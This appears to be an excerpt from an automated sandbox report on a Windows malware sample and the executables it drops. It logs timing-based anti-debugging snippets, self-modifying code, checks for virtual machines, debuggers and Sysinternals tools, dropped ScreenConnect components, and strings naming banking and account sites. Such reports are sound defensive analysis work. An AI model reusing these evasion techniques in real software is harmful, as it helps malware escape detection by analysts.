Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B4095B second address: 4B4095F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B4095F second address: 4B4097A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B4097A second address: 4B40997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0E39507Ah 0x00000008 mov dh, FAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f movzx eax, bx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop edi 0x00000019 movzx eax, dx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B40997 second address: 4B409D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8EA4E2EA50h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F8EA4E2EA50h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B409D5 second address: 4B409D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B409D9 second address: 4B409DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B409DD second address: 4B409E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B4076C second address: 4B40772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B40772 second address: 4B407B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F8EA52B3CB9h 0x0000000f mov eax, 38585097h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8EA52B3CB9h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AE023E second address: 4AE0256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA4E2EA54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B40B6C second address: 4B40B72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B40B72 second address: 4B40B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B40B76 second address: 4B40B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8EA52B3CB7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B40B98 second address: 4B40B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B40B9E second address: 4B40BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B40BA2 second address: 4B40BC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8EA4E2EA4Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov edi, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 movzx eax, di 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B40BC2 second address: 4B40C0E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8EA52B3CB5h 0x00000008 adc esi, 610716F6h 0x0000000e jmp 00007F8EA52B3CB1h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F8EA52B3CAEh 0x0000001e push dword ptr [ebp+0Ch] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B40C0E second address: 4B40C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Special instruction interceptor: First address: 19EE07 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Special instruction interceptor: First address: 33FCC6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Special instruction interceptor: First address: 33EF8D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Special instruction interceptor: First address: 3CD541 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 64EE07 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7EFCC6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7EEF8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 87D541 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Special instruction interceptor: First address: 39193E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Special instruction interceptor: First address: 53825C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Special instruction interceptor: First address: 544A58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Special instruction interceptor: First address: 5CB5AD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Special instruction interceptor: First address: 12DA92 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Special instruction interceptor: First address: 2D374E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Special instruction interceptor: First address: 2FABFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Special instruction interceptor: First address: 35EB9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Special instruction interceptor: First address: 2D1E54 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Memory allocated: 4C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Memory allocated: 4F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Memory allocated: 4E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Memory allocated: 1850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Memory allocated: 3260000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Memory allocated: 3070000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe

Code function: 0_2_04B40C84 rdtsc

0_2_04B40C84

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 606	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 456	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 599	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 653	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 4567	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 631	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Window / User API: threadDelayed 3000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Window / User API: threadDelayed 6642	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp-\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6664	Thread sleep time: -56028s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5608	Thread sleep count: 606 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5608	Thread sleep time: -1212606s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5916	Thread sleep count: 456 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5916	Thread sleep time: -13680000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6908	Thread sleep count: 599 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6908	Thread sleep time: -1198599s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6812	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3840	Thread sleep count: 610 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3840	Thread sleep time: -1220610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5648	Thread sleep count: 653 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5648	Thread sleep time: -1306653s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5928	Thread sleep count: 4567 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5928	Thread sleep time: -9138567s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5928	Thread sleep count: 631 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5928	Thread sleep time: -1262631s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe TID: 6644	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe TID: 5640	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe TID: 2044	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Thread delayed: delay time: 922337203685477

Source: skotes.exe, skotes.exe, 00000003.00000002.2209664898.00000000007CF000.00000040.00000001.01000000.00000007.sdmp, loqVSeJ.exe, loqVSeJ.exe, 00000009.00000002.2997733886.000000000051B000.00000040.00000001.01000000.00000009.sdmp, 7fOMOTQ.exe, 0000000B.00000002.4375966874.00000000002B4000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: tmpB2E7.tmp.9.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: tmpB2E7.tmp.9.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: tmpB2E7.tmp.9.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: tmpB2E7.tmp.9.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: tmpB2E7.tmp.9.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: tmpB2E7.tmp.9.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: tmpB2E7.tmp.9.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 7fOMOTQ.exe, 7fOMOTQ.exe, 0000000B.00000003.4329987890.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000002.4378625943.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4251473882.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4311906705.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4374283231.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000002.4378337606.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4239979486.00000000012F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: tmpB2E7.tmp.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: tmpB2E7.tmp.9.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: tmpB2E7.tmp.9.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: tmpB2E7.tmp.9.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 7fOMOTQ.exe, 0000000B.00000003.4270482587.0000000005B8E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: loqVSeJ.exe, 00000009.00000002.2998515080.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: tmpB2E7.tmp.9.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: tmpB2E7.tmp.9.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: tmpB2E7.tmp.9.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: tmpB2E7.tmp.9.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: tmpB2E7.tmp.9.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: tmpB2E7.tmp.9.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: tmpB2E7.tmp.9.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: tmpB2E7.tmp.9.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000005528000.00000004.00000800.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.3001587383.00000000051D3000.00000004.00000800.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.3001587383.000000000506F000.00000004.00000800.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.3001587383.0000000005161000.00000004.00000800.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.3001587383.0000000005246000.00000004.00000800.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.3001587383.00000000052B8000.00000004.00000800.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.3001587383.00000000050E8000.00000004.00000800.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.3001587383.000000000532B000.00000004.00000800.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.3001587383.000000000536C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 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
Source: tmpB2E7.tmp.9.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: tmpB2E7.tmp.9.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: tmpB2E7.tmp.9.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: tmpB2E7.tmp.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: tmpB2E7.tmp.9.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: tmpB2E7.tmp.9.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: tmpB2E7.tmp.9.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: tmpB2E7.tmp.9.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: tmpB2E7.tmp.9.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: tmpB2E7.tmp.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Ryay9q4aDy.exe, 00000000.00000002.2163894915.000000000031F000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2200474707.00000000007CF000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2209664898.00000000007CF000.00000040.00000001.01000000.00000007.sdmp, loqVSeJ.exe, 00000009.00000002.2997733886.000000000051B000.00000040.00000001.01000000.00000009.sdmp, 7fOMOTQ.exe, 0000000B.00000002.4375966874.00000000002B4000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: tmpB2E7.tmp.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: tmpB2E7.tmp.9.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
